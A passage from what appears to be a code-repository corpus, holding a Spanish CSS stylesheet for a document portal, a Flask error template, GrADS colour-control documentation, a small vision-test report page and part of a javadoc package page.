.verdescargar {margin:0 !important; padding-bottom: 3px !important; margin-top: 8px !important;}
.ficherodescarga a {font-size: 10px; text-decoration: none; font-weight: 400; background: none; padding: 0; padding-right: 5px; color: #0d8538;}
.ficherodescarga a:hover {color: #004130;}
.ficherodescarga img {padding-right: 3px; vertical-align: text-bottom;}
#pie-documento {display: block; height: 25px; margin-left: 25px; border-top: 1px solid #eee;}
#propietario-fecha {display: block; background: none !important; float: right; margin-right: 3px; color: #777; font-size: 11px;}
#mostrar-compartido {width: 80%; float: left; margin-left: -5px;}
#mostrar-compartido input.enlinea {display: inline-block; float: left; margin-top: 4px; margin-right: 10px;}
#mostrar-compartido input.enlinea:hover {-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=50)"; filter:alpha(opacity=50); -moz-opacity: 0.5; -webkit-opacity: 0.5; -khtml-opacity: 0.5; opacity: 0.5;}
/* -- cabecera -- */
.portalanagrama img {margin-left: 188px; margin-top: 37px;}
.headbar {background: #004130 url('../img/prueba-portada-06.png') no-repeat right bottom;}
.logo {height: 32px; background-color: #f0f0f0; box-shadow: 1px 2px 10px #000;}
.logo img {display: none;}
.logo h1 {background: transparent url('../img/logo-dpi-05.png') center no-repeat; background-position: 0 0; width: 219px; height: 75px; position: absolute; top: 0px; left: 0; text-indent: -9999px;}
/* -- Login -- */
.logincontenedor { background: #f0f0f0; position: absolute; width: 100%; height: 100%; top: 0; right: 0; z-index: 1001; display: block;}
.logincaja {width: 20%; min-width: 270px; background: #004130; position: absolute; top: 25%; left: 40%; border-radius: 8px; padding: 20px; box-shadow: 1px 1px 10px #000; background: #004130 url('../theme/9-docs.png') center no-repeat; background-position: 50% 3px; height: 240px;}
.tablalogin td {padding-bottom: 20px; padding-left: 7px;}
.tablalogin td span {color: #f0f0f0;}
.tablalogin #login, .tablalogin #password {width: 310px; margin-left: 10px; margin-right: 0; border:0;}
.logincaja form {margin-top: 25px;}
.tablalogin .boton-aceptar {float: right; font-size: 16px; width: 80px; margin-right: 10px; border-color:#fafafa;}
/* -- Gestion Categorias -- */
.listadocategoriaseditar {margin-left: 15px; text-align: left; font-size: 14px; width: 99%; max-width: 600px;}
.listadocategoriaseditar tbody tr:nth-child(2n+1) {background-color: rgba(190,190,190,0.5);}
.listadocategoriaseditar tr:first-child {background-color: transparent;}
.listadocategoriaseditar tr td {vertical-align: middle;}
.listadocategoriaseditar tr th {padding-top: 10px; padding-bottom: 10px; color: #004130;}
.listadocategoriaseditar input[type="image"] {margin-top: 0; float: left; margin-left: 15px;}
.listadocategoriaseditar input[type="image"]:hover {-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=50)"; filter:alpha(opacity=50); -moz-opacity: 0.5; -webkit-opacity: 0.5; -khtml-opacity: 0.5; opacity: 0.5;}
.listadocategoriaseditar .tabla-sininput {color: #004130; font-size: 14px !important; height: 26px; padding: 5px 0;}
/*.listadocategoriaseditar input[type="text"]:focus {background-color: #fff; border-radius: 4px; cursor: text !important;}
.listadocategoriaseditar input[type="text"]:hover {cursor: pointer;}*/
.entrar-edit-cat a {background: transparent url('../img/verde/entrar.png') center no-repeat; float:left; background-position: 5px 0; width: 20px; height: 20px; display: block; text-indent: -9999px; padding-left: 5px;}
.entrar-edit-cat a:hover {-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=50)"; filter:alpha(opacity=50); -moz-opacity: 0.5; -webkit-opacity: 0.5; -khtml-opacity: 0.5; opacity: 0.5;}
tr#boton-edicion-categoria {background-color: transparent;}
#boton-edicion-categoria td {padding-top: 15px;}
.edicion_categorias legend {font-size: 16px; font-weight: 700; color: #004130; padding: 0 !important; margin-left: 10px; background: transparent url('../img/triangulo-azul.png') center no-repeat; background-position: 0 7px; padding-left: 15px !important;}
.edicion_categorias fieldset {border: none; padding:0;}
.edicion_categorias h4 {text-transform: uppercase; margin: 25px 0 10px 15px; color: #004130; padding-left: 15px; background: transparent url('../img/verde/angulo.png') center no-repeat; background-position: 0 3px;}
.enlacesuperior a {display: block; height: 20px; margin-bottom: 20px; margin-left: 15px; background: transparent url('../img/verde/salir.png') center no-repeat; background-position: 0 0; padding-left: 30px; padding-top: 2px; color: #0d8538; text-decoration: none; font-size: 14px; font-weight: 700;} /* en versión azul este color es: 4aa7c9 */
.enlacesuperior a:hover {color: #004130; background-position: 0 -40px;}
.subtitulo-sintabla {margin-top: 15px;}
.texto-oculto {text-indent: -9999px;}
.js-usuario {color: #0d8538 !important;}
.js-grupo{color: #004130 !important;}
.etiqueta-grupo.js-usuario span , .etiqueta-grupo.js-grupo span {color: #f0f0f0;}
.etiqueta-grupo.js-usuario {background-color: #0d8538;}
.etiqueta-grupo.js-grupo {background-color: #004130;}
.js-usuario input[type="image"], .js-grupo input[type="image"] {margin-top: 1px !important; margin-left: 5px; padding-right: 1px; padding-top: 1px; background-color: #ddd; border-radius: 2px;}
.etiqueta-grupo.js-grupo:hover {border: 1px ridge #fafafa; background-color: #aaa;}
.etiqueta-grupo.js-usuario:hover {border: 1px ridge #fafafa; background-color: #ccc;}
.js-usuario input[type="image"]:hover, .js-grupo input[type="image"]:hover {-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=50)"; filter:alpha(opacity=50); -moz-opacity: 0.5; -webkit-opacity: 0.5; -khtml-opacity: 0.5; opacity: 0.5;}
.compartido input[type="image"] {margin-left: 10px; margin-top: 10px; float: left;}
.compartido {min-height: 50px;}
#compartidocon {display: block; float: left; width: 55%; margin-left: 10px; margin-top: 5px; margin-bottom: 0;}
#compartidocon .grupo-etiquetas {float: right;}
/* -- Gestion Documentos - Mis documentos -- */
.listadocontenidos {margin-left: 15px; text-align: left; width: 99%;}
.listadocontenidos tbody tr:nth-child(2n+1) {background-color: rgba(190,190,190,0.5);}
.listadocontenidos tr:first-child {background-color: transparent;}
.listadocontenidos tr td {vertical-align: middle; font-size: 14px;}
.listadocontenidos tr th {padding-top: 30px; padding-bottom: 10px; color: #004130;}
.listadocontenidos input[type="image"] {margin-top: 0; float: left; margin-left: 15px;}
.listadocontenidos input[type="image"]:hover {-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=50)"; filter:alpha(opacity=50); -moz-opacity: 0.5; -webkit-opacity: 0.5; -khtml-opacity: 0.5; opacity: 0.5;}
.listadocontenidos input[type="text"] {border-top: 1px solid #fff; border-right: 1px solid #fff; border-bottom: 1px solid #bbb; border-left: 1px solid #bbb;; color: #004130; background-color: transparent; font-size: 14px !important; margin: 2px -5px;}
.listadocontenidos input[type="text"]:focus {background-color: #fff; border-radius: 4px; cursor: text !important;}
.listadocontenidos input[type="text"]:hover {cursor: pointer;}
.listadocontenidos a {font-size: 14px; text-decoration: none; font-family:'Verdana' !important;}
.listadocontenidos a:hover {color: #0d8538;}
.columna-editar {text-indent: -9999px;}
.editar-contenido a {margin: 4px 0; background: transparent url('../img/verde/editar1.png') center no-repeat; background-position: 5px 0; width: 20px; height: 20px; display: block; text-indent: -9999px; padding-left: 5px;}
.editar-contenido a:hover {-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=50)"; filter:alpha(opacity=50); -moz-opacity: 0.5; -webkit-opacity: 0.5; -khtml-opacity: 0.5; opacity: 0.5;}
.tipo nobr, .tipo p {font-size: 100%;}
.gestion-documentos {margin-left: 15px;}
.gestion-documentos .boton-alta {margin-left: 0; margin-bottom: 20px;}
.gestion-documentos td.celda-buscador {padding-top: 5px;}
.doc-html, .doc-imagen, .doc-video, .doc-pdf, .doc-datos, .doc-rss, .doc-chklst {text-indent: -9999px; background-position: 0 0; height: 20px;}
.doc-html {background: transparent url('../img/verde/html.png') left no-repeat;}
.doc-imagen {background: transparent url('../img/verde/imagen.png') left no-repeat;}
.doc-video {background: transparent url('../img/verde/video.png') left no-repeat;}
.doc-pdf {background: transparent url('../img/verde/pdf.png') left no-repeat;}
.doc-datos {background: transparent url('../img/verde/datos.png') left no-repeat;}
.doc-rss {background: transparent url('../img/verde/rss.png') left no-repeat;}
.doc-chklst {background: transparent url('../img/verde/chklst.png') left no-repeat;}
.listadocontenidos tr td input[type="checkbox"] {display: none;}
.listadocontenidos tr td input[type="checkbox"] + label span {display: inline-block; width: 20px; height: 20px; background: url('../img/verde/checkbox.png') center no-repeat; background-position: 10px 0; vertical-align: middle; cursor:pointer; padding-left: 10px;}
.listadocontenidos tr td input[type="checkbox"]:checked + label span{background: url('../img/verde/checkbox.png') center no-repeat; background-position: 10px -40px;}
#botonMenu {background: url('../img/verde/opciones.png') no-repeat center; padding: 2px 0px 2px 25px;; cursor:pointer; opacity: 1; background-position: 0 1px; margin-left: 10px;} /* -- VIENE DE :context menu css -- */
#compartido-admin {float: right; margin-right: 15px;}
#compartido-admin input[type="checkbox"] {display: none;}
#compartido-admin input[type="checkbox"] + label span {display: inline-block; width: 50px; height: 32px; background: url('../img/verde/admin-on-02.png') center no-repeat; background-position: 0 -59px; vertical-align: middle; cursor: pointer; float: left; margin-bottom: 10px;}
#texto-compartido-admin {width: 110px; display: block; float: left; color: #0af7b9; background-color: #004130; border-top-left-radius: 10px; border-bottom-left-radius: 10px; text-align: center; border: 5px solid #004130;}
#compartido-admin input[type="checkbox"]:checked + label span {background: url('../img/verde/admin-on-02.png') center no-repeat; background-position: 0 -9px;}
.celda-subir {width: 180px;}
.celda-compartido-admin {text-align: right;}
.gestion-documentos {width: 100%;}
/* -- Compartidos conmigo -- */
#tabla-compme tr th {text-indent: 10px;}
#tabla-compme tr td {text-indent: 10px; padding: 3px 0;}
/* -- Crear/editar documentos-archivos -- */
table td.colbtn input { margin-right:10px;}
.editor-documentos, .editor-archivos {margin-left: 15px;}
.editor-documentos td, .editor-archivos td {padding-top: 25px !important; padding-left:10px;}
.editor-documentos .tabla-filauno td, .editor-archivos .tabla-filauno td {padding-top: 0 !important;}
.editor-documentos select, .editor-archivos select {border-radius: 4px; height: 26px; margin-left: 0; margin-right: 5px; margin-bottom:5px; text-indent: 5px; font-size: 13px !important; border: 2px inset #eee;}
.editor-documentos input.enlinea, .editor-archivos input.enlinea {float: left; margin-right: 10px; margin-top: 7px;}
.editor-documentos input.enlinea:hover, .editor-archivos input.enlinea:hover, .compartido input.enlinea:hover {-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=50)"; filter:alpha(opacity=50); -moz-opacity: 0.5; -webkit-opacity: 0.5; -khtml-opacity: 0.5; opacity: 0.5;}
span.cke_skin_kama {border: 1px solid #aaa !important; padding: 0 !important;}
.cke_skin_kama, .cke_wrapper {padding-top: 0 !important; background-color: #e4e4e4 !important;}
.cke_skin_kama, .cke_editor {width: 99%;}
.cke_contents iframe {border-radius: 5px; border: 2px inset #ddd;}
#cke_contents_descripcion.cke_contents, #cke_contents_prueba-color.cke_contents {height: 100px !important; width: 99% !important;}
.tipo span {color: #0d8538; font-weight: 700;} /* en versión azul este color es: 4aa7c9 */
td.tipo {min-width: 160px !important;}
.editor-documentos .boton-aceptar, .editor-archivos .boton-aceptar {float: left; margin-bottom: 20px; font-size: 16px; padding: 5px 15px; font-weight: 700; margin-right:5px;}
#datos-archivo {border: 1px solid #aaa; border-radius: 5px; padding: 5px; display: block; width: 540px; min-height: 100px; background-color: #e4e4e4; padding-top: 40px; background-image: url('../js/ckeditor/skins/kama/images/sprites.png'); background-repeat: repeat-x; background-position: 0 -1950px;}
#datos-archivo span {display: block; float: left; width: 130px; margin-right: 5px; margin-top: 4px; margin-bottom: 21px;}
#cajanombrearchivo {display: block; width: 400px; height: 24px; border: 2px inset #eee; float: left; border-radius: 4px; background-color: #fff;}
#archivo-actual {margin-bottom: 10px;}
#archivo-cambiar {clear: both; display: block; float:left;}
#file-uploader {display: block; clear: both;}
#file-uploader .boton-alta {float: right; margin-bottom: 5px; margin-right: 3px; line-height: 2px; padding-top: 15px; width: 160px; height: 18px;}
#file-uploader .qq-upload-list {clear:both;}
#file-uploader .qq-upload-list li span {color: red;}
#publicar-archivo, #publicar-documento {display: block; float: right; margin-right: 3px;}
.cancelar-form .boton-cancelar {float: right; margin-left: 15px; font-size: 16px; padding: 5px 15px; font-weight: 700;}
/* -- Mensajes de aviso -- */
.mensajeaviso, .cerradaconexion {
padding: 20px;
padding-left: 65px;
font-size: 16px;
color: #f0f0f0;
width: 350px;
margin: 40px auto;
}
.cerradaconexion p, .cerradaconexion p strong {color: #f0f0f0; font-size: 16px; text-align: left;}
.cerradaconexion a {color: #004130; font-size: 16px;}
.cerradaconexion a:hover {color: #0ae7b9;}
.mensajeaviso a {font-size: 16px; text-decoration: none; color: #004130; padding-left: 30px; background: transparent url('../img/verde/volver-claro.png') center no-repeat; background-position: 10px -13px;}
.mensajeaviso a:hover {color: #0ae7b9; background-position: 10px 6px;}
.bocadillo-aviso {position: relative; background: #02b284; border: 2px solid #004130; border-radius: 4px; font-size: 16px; background: #02b284 url('../images/informacion-verde.png') center no-repeat; background-position: 20px 14px;}
.bocadillo-aviso:after, .bocadillo-aviso:before {top: 100%; left: 50%; border: solid transparent; content: " "; height: 0; width: 0; position: absolute; pointer-events: none;}
.bocadillo-aviso:after {border-color: rgba(2, 178, 132, 0); border-top-color: #02b284; border-width: 15px; margin-left: -15px;}
.bocadillo-aviso:before {border-color: rgba(0, 65, 48, 0); border-top-color: #004130; border-width: 18px; margin-left: -18px;}
li.enlaces {color: #0d8538; background-color: #004130; padding-left: 45px; padding-bottom: 5px; background: #004130 url('../img/verde/triangulo-menu-02.png') center no-repeat; background-position: 30px -86px;}
.titulo{ margin-left:15px; text-indent:5px; margin-bottom:15px; padding:6px 4px; background-color:#004130; color:#f0f0f0; margin-top:20px; border-radius:4px; width: 350px; font-size:16px;}
.font { font-family:'Verdana' !important; font-size:14px; }
select#categoriaseleccionada{ font-family:'Verdana' !important; width:363px; font-size:14px; margin-top:15px; height:27px;}
#popupcategorias { height:auto !important; }
.pregunta-larga {
min-width:20em;
}
.iconbtn {
background-color: transparent;
border:0px;
}
.js-remarcado-1 {
opacity:0.7;
}
.js-remarcado-1 {
opacity:0.8;
outline: 1px solid greenyellow;
}
.js-remarcado-1 {
opacity:1;
outline: 1px solid greenyellow;
}
.nombre-grupo {
min-width: 20em;
}
/* Checklist */
div#formulario-inicio-checklist p.nombre-checklist { background:transparent url(../img/h1-avion.png) no-repeat 5px 2px; font-size:16px; padding-left:30px; color:#666666; margin-bottom:10px; }
div#formulario-inicio-checklist input {}
.mrg40 { margin-bottom:40px; clear:both;}
div.grupos p.nombre-grupo { background:transparent url(../img/h1-avion.png) no-repeat 5px 2px; font-size:24px; padding-left:30px; color:#666666; line-height:24px; margin-bottom:20px;}
div.grupos div.preguntas { border-radius:5px; border:1px solid #cccccc; padding:8px; margin-bottom:10px; background-color: #f2f2f2;}
div.grupos p.pregunta { font-size:16px; color:#333333; }
div.grupos p.explicacion { font-size:12px; color:#999999; margin-bottom:15px; }
div.grupos div.caja-valores { font-size: 14px;}
div.grupos div.valores p { display: inline-block; }
div.grupos div.valores p input { border: 1px solid #666666; }
div.grupos div.valores p textarea{ border: 1px solid #999999; background-color:#fafafa; border-radius:4px; padding:4px; color:#666666; font-size:12px;}
div.grupos div.valores label { display: inline-block; color:#666666; }
/* rss */
p.avion { background:transparent url(../img/h1-avion.png) no-repeat 5px 2px; font-size:24px; padding-left:30px; color:#666666; line-height:24px; margin-bottom:20px;}
li.lst-canal { display:inline-block; border-radius:5px; border:1px solid #cccccc; padding:8px; margin-bottom:10px; background-color: #f2f2f2; width: 98%;}
li.lst-canal h3 a { margin-bottom:5px; font-size:14px; color:#333333;}
li.lst-canal p { font-size:12px; color:#666666; margin:8px 0; line-height:14px;}
li.lst-canal p img { margin-right:8px; }
p.resultados {
border-radius: 5px;
border: 1px solid #cccccc;
padding: 8px;
margin-bottom: 10px;
background-color: #f2f2f2;
font-size: 18px;
color:black;
}
p.autor-rellenado {
border-radius: 5px;
border: 1px solid #cccccc;
padding: 8px;
margin-bottom: 10px;
background-color: #f2f2f2;
font-size: 18px;
color:black;
}
div.websumarize-descarga-div {
border-radius: 5px;
border: 1px solid #cccccc;
padding: 8px;
margin-bottom: 10px;
background-color: #f2f2f2;
font-size: 18px;
color:black;
}
div.websumarize-descarga-div a {
margin-left: 20px;
color: #0d8538;
text-decoration:none;
font-size: 14px;
}
div.websumarize-descarga-div a:hover {
text-decoration: underline;
}
p.puntuacion-conforme {
color:green;
}
p.puntuacion-no-conforme {
color: brown;
}
|
snakeeyes/templates/errors/500.html | 26huitailang/bsawf | {% extends 'layouts/app.html' %}
{% block title %}Error 500{% endblock %}
{% block heading %}<h2>Error 500</h2>{% endblock %}
{% block body %}
<p>Add a soothing error 500 message here.</p>
{% endblock %} |
doc/colorcontrol.html | cjg/grads | <!--Copyright (C) 1988-2005 by the Institute of Global Environment and Society (IGES). See file COPYRIGHT for more information.-->
<html>
<head>
<title>Controlling Colors in GrADS</title>
</head>
<body bgcolor="e0f0ff" text="#000000">
<h2><b>Controlling Colors in GrADS</b></h2>
<p>
<font size=+1><b><i>The GrADS Default Colors</i></b></font>
<p>
GrADS is built with 16 default colors that are used in a variety of
applications. Every color in GrADS has a unique <i>color number</i> that is used
as an index to identify it in GrADS commands. Complete specifications
of the default colors numbered 0 to 15 are given below:
<p>
<pre>
Col# Description Sample R G B
<br>
0 background <img src="images/dot_b.gif" width=50 height=12> 0 0 0 (black by default)<br>
1 foreground <img src="images/dot_w.gif" width=50 height=12> 255 255 255 (white by default)<br>
2 red <img src="images/dot_2.gif" width=50 height=12> 250 60 60 <br>
3 green <img src="images/dot_3.gif" width=50 height=12> 0 220 0 <br>
4 dark blue <img src="images/dot_4.gif" width=50 height=12> 30 60 255 <br>
5 light blue <img src="images/dot_5.gif" width=50 height=12> 0 200 200 <br>
6 magenta <img src="images/dot_6.gif" width=50 height=12> 240 0 130 <br>
7 yellow <img src="images/dot_7.gif" width=50 height=12> 230 220 50 <br>
8 orange <img src="images/dot_8.gif" width=50 height=12> 240 130 40 <br>
9 purple <img src="images/dot_9.gif" width=50 height=12> 160 0 200 <br>
10 yellow/green <img src="images/dot_10.gif" width=50 height=12> 160 230 50 <br>
11 medium blue <img src="images/dot_11.gif" width=50 height=12> 0 160 255 <br>
12 dark yellow <img src="images/dot_12.gif" width=50 height=12> 230 175 45 <br>
13 aqua <img src="images/dot_13.gif" width=50 height=12> 0 210 140 <br>
14 dark purple <img src="images/dot_14.gif" width=50 height=12> 130 0 220 <br>
15 gray <img src="images/dot_15.gif" width=50 height=12> 170 170 170 <br>
</pre>
<font size=-1>Disclaimer: The color samples may not be displayed properly.</font>
<p>
<font size=+1><b><i>The GrADS Default Rainbow Sequence</i></b></font>
<p>
GrADS creates a default rainbow palette using the following sequence of 13 built-in colors:
<table>
<tr align=center>
<td>9</td>
<td>14</td>
<td>4</td>
<td>11</td>
<td>5</td>
<td>13</td>
<td>3</td>
<td>10</td>
<td>7</td>
<td>12</td>
<td>8</td>
<td>2</td>
<td>6</td>
</tr>
<tr>
<td><img src="images/dot_9.gif" width=45 height=12></td>
<td><img src="images/dot_14.gif" width=45 height=12></td>
<td><img src="images/dot_4.gif" width=45 height=12></td>
<td><img src="images/dot_11.gif" width=45 height=12></td>
<td><img src="images/dot_5.gif" width=45 height=12></td>
<td><img src="images/dot_13.gif" width=45 height=12></td>
<td><img src="images/dot_3.gif" width=45 height=12></td>
<td><img src="images/dot_10.gif" width=45 height=12></td>
<td><img src="images/dot_7.gif" width=45 height=12></td>
<td><img src="images/dot_12.gif" width=45 height=12></td>
<td><img src="images/dot_8.gif" width=45 height=12></td>
<td><img src="images/dot_2.gif" width=45 height=12></td>
<td><img src="images/dot_6.gif" width=45 height=12></td>
</tr>
</table>
<p>
When drawing contour plots, the default behaviour of GrADS is to color
code the contours and select an appropriate contour interval so that
each contour is a different color and the colors span the range of the
default rainbow sequence. The same principle is behind the selection
of default contour intervals for filled contours and shaded grid
plots.
<p>
The scripts <code>"cbar.gs"</code> and <code>"cbarn.gs"</code> will
draw a color key alongside a plot of filled contours or shaded grid
cells; the script uses the <a href="gradcomdquery.html"><code>query
shades</code></a> command to get information about the contour levels
and their color shades.
<p>
<font size=+1><b><i>Defining new colors</i></b></font>
<p>
For some types of displays, the 16 GrADS default colors may not be
suitable or adequate. It is possible for the user to define new colors
using the <a href="gradcomdsetrgb.html"><code>set rgb</code></a> command:
<p>
<ul>
<code><a href="gradcomdsetrgb.html">set rgb</a> <i>color# R G B</i></code>
</ul>
<p>
For example, let's create a palette of colors for
plotting anomalies. We need to define new colors that will be shades
of blue and red that range in intensity from fully saturated to very
light. White will be the color in the center of the new anomaly
palette.
<p>
<ul>
<pre>
* These are the BLUE shades
<a href="gradcomdsetrgb.html">set rgb</a> 16 0 0 255
<a href="gradcomdsetrgb.html">set rgb</a> 17 55 55 255
<a href="gradcomdsetrgb.html">set rgb</a> 18 110 110 255
<a href="gradcomdsetrgb.html">set rgb</a> 19 165 165 255
<a href="gradcomdsetrgb.html">set rgb</a> 20 220 220 255
* These are the RED shades
<a href="gradcomdsetrgb.html">set rgb</a> 21 255 220 220
<a href="gradcomdsetrgb.html">set rgb</a> 22 255 165 165
<a href="gradcomdsetrgb.html">set rgb</a> 23 255 110 110
<a href="gradcomdsetrgb.html">set rgb</a> 24 255 55 55
<a href="gradcomdsetrgb.html">set rgb</a> 25 255 0 0
</pre>
</ul>
<p>
<font size=+1><b><i>Overriding the Defaults</i></b></font>
<p>
Now that we have a set of newly defined colors (numbered 16-25), we
can override the defaults and specify our anomaly palette with exact
contour levels and the colors that go with them. This is accomplished
by using the following commands:
<p>
<ul>
<code>
<a href="gradcomdsetclevs.html">set clevs</a> <i>lev1 lev2 lev3 ... levN</i><br>
<a href="gradcomdsetccols.html">set ccols</a> <i>col1 col2 col3 ... colN</i><br>
</code>
</ul>
<p>
Contour levels and the colors that go with them are reset with every
execution of <a href="gradcomdclear.html"><code>clear</code></a> or
<a href="gradcomddisplay.html"><code>display</code></a>. Thus, it may be
easier to use these commands in a script to avoid typing them over and
over again.
<p>
<b><i>Filled Contours or Shaded Grids:</i></b> If you are specifying
the levels and colors for filled contours (<code><a
href="gradcomdsetgxout.html">set gxout</a> shaded</code>) or shaded
grid cells (<code><a href="gradcomdsetgxout.html">set gxout</a>
grfill</code>), then the number of colors specified with <a
href="gradcomdsetccols.html">set ccols</a> must be one larger than the
number of contour levels specified with <a
href="gradcomdsetclevs.html">set clevs</a>. Continuing with our
example of creating an anomaly palette, the commands would have the
following syntax:
<p>
<ul>
<code>
<a href="gradcomdsetgxout.html">set gxout</a> shaded<br>
<a href="gradcomdsetclevs.html">set clevs</a> -5 -4 -3 -2 -1 1 2 3 4 5<br>
<a href="gradcomdsetccols.html">set ccols</a> 16 17 18 19 20 1 21 22 23 24 25<br>
</code>
</ul>
<p>
Note the "0" contour level has been omitted, but color number "1" is still in
the palette. Drawing a plot with these specified <code>clevs</code>
and <code>ccols</code> and then running the "cbarn.gs" script will
result in the following color key:
<p>
<img src="key.gif">
<p>
Here is example using 6 colors and 5 contour levels that shows how the
filled contours (or shaded grids) relate to the data values:
<p>
<ul>
<pre>
col1: values <= lev1
col2: lev1 < values <= lev2
col3: lev2 < values <= lev3
col4: lev3 < values <= lev4
col5: lev4 < values <= lev5
col6: lev5 < values
</pre>
</ul>
<p>
<b><i>Line Contours:</i></b> If you are specifying the levels and
colors for line contours (<code><a href="gradcomdsetgxout.html">set
gxout</a> contour</code>), then the number of arguments to <a
href="gradcomdsetclevs.html">set clevs</a> and <a
href="gradcomdsetccols.html">set ccols</a> should be equal -- one
color for each contour.
<p>
<font size=+1><b><i>Plotting Contours of Constant Color</i></b></font>
<p>
It is sometimes preferable to plot line contours without the rainbow
coloring. An example might be a plot with sea level pressure contours
in one color (red) and 500 mb height contours overlaid in another
color (blue). For drawing all the contours in the same color, use the
<a href="gradcomdsetccolor.html"><code>set ccolor</code></a> command:
<p>
<ul>
<code>
<a href="gradcomdsetgxout.html">set gxout</a> contour <br>
<a href="gradcomdsetccolor.html">set ccolor</a> 2 <br>
<a href="gradcomddisplay.html">d</a> slp <br>
<a href="gradcomdsetccolor.html">set ccolor</a> 4 <br>
<a href="gradcomddisplay.html">d</a> z(lev=500) <br>
</code>
</ul>
<p>
<font size=+1><b><i>Omitting Colors</i></b></font>
<p>
The default behavior of GrADS when plotting filled contours or shaded
grid cells is to colorize all areas. To omit a particular color (or
contour level) from the plot, simply assign the background color. For
example:
<p>
<ul>
<code>
<a href="gradcomdsetgxout.html">set gxout</a> shaded<br>
<a href="gradcomdsetclevs.html">set clevs</a> -5 -4 -3 -2 -1 1 2 3 4 5<br>
<a href="gradcomdsetccols.html">set ccols</a> 0 17 18 19 20 0 21 22 23 24 0<br>
</code>
</ul>
<p>
This example is similar to the one given above, but notice where some
of the <code>ccols</code> have been set to "0" (the background
color). The first, last, and middle colors have been omitted. These
commands set up a plot that will only shade areas where the anomalies
are between 1 and 5 and -1 and -5. The remaining areas will be black.
<p>
<font size=+1><b><i>Plotting Non-Continuous Index Grids </i></b></font>
<p>
Plotting grids with index values or non-continuous data (e.g. surface
type classification) is simplified by using the graphics output type
<code>fgrid</code> and the <a href="gradcomdsetfgvals.html"><code>set
fgvals</code></a> command.
<p>
<ul>
<code>
<a href="gradcomdsetgxout.html">set gxout</a> fgrid <br>
<a href="gradcomdsetfgvals.html">set fgvals</a> 1 15 2 5 3 1 <br>
<a href="gradcomddisplay.html">d</a> sfctype <br>
</code>
</ul>
<p>
In this example, the variable <code>"sfctype"</code> has three values:
<code>1</code> represents land, <code>2</code> represents oceans, and
<code>3</code> represents sea ice. These commands would draw a plot
with land grid cells filled with color number 15 (gray), ocean grid
cells filled with color number 5 (light blue), and sea ice grid cells
filled with color number 1 (white). If the first two arguments to <a
href="gradcomdsetfgvals.html">set fgvals</a> were omitted, then the
land grid cells would not be omitted and only ocean and sea ice grid
cells would be colored.
</body>
</html>
|
catkin_ws/Reports/bold-manhatten-test/fanta_orange/fanta_orange9.html | MarcGroef/ros-vision | <!DOCTYPE html>
<html>
<h1>fanta_orange9</h1>
<p> BOLD: 0/1 correct and 1/1false</p>
<p> SIFT: 0/0 correct and 0/0false</p><br>
<img src = "../../../BVD_M01/fanta_orange/fanta_orange9.jpg" alt = "fanta_orange9.html" style= " width:320px;height:240px;"> <h1> Falsely compared to: </h1><br>
<img src = "../../../BVD_M01/coca_cola_original/coca_cola_original4.jpg" alt = "BVD_M01/coca_cola_original/coca_cola_original4.jpg" style= " width:320px;height:240px;"> </html> |
doc/interfaz/package-summary.html | Tiven123/SpiderSearch-Engine-Stage-2 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="es">
<head>
<!-- Generated by javadoc (version 1.6.0_35) on Mon Jun 01 12:12:58 CST 2015 -->
<title>interfaz</title>
<meta name="date" content="2015-06-01">
<link rel="stylesheet" type="text/css" href="../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="interfaz";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../overview-summary.html">Overview</a></li>
<li class="navBarCell1Rev">Package</li>
<li>Class</li>
<li><a href="package-use.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../deprecated-list.html">Deprecated</a></li>
<li><a href="../index-files/index-1.html">Index</a></li>
<li><a href="../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../Cliente/package-summary.html">PREV PACKAGE</a></li>
<li><a href="../Main/package-summary.html">NEXT PACKAGE</a></li>
</ul>
<ul class="navList">
<li><a href="../index.html?interfaz/package-summary.html" target="_top">FRAMES</a></li>
<li><a href="package-summary.html" target="_top">NO FRAMES</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h1 title="Package" class="title">Package interfaz</h1>
</div>
<div class="contentContainer">
<ul class="blockList">
<li class="blockList">
<table class="packageSummary" border="0" cellpadding="3" cellspacing="0" summary="Class Summary table, listing classes, and an explanation">
<caption><span>Class Summary</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Class</th>
<th class="colLast" scope="col">Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><a href="../interfaz/InterfazCliente.html" title="class in interfaz">InterfazCliente</a></td>
<td class="colLast"> </td>
</tr>
</tbody>
</table>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../overview-summary.html">Overview</a></li>
<li class="navBarCell1Rev">Package</li>
<li>Class</li>
<li><a href="package-use.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../deprecated-list.html">Deprecated</a></li>
<li><a href="../index-files/index-1.html">Index</a></li>
<li><a href="../help-doc.html">Help</a></li>
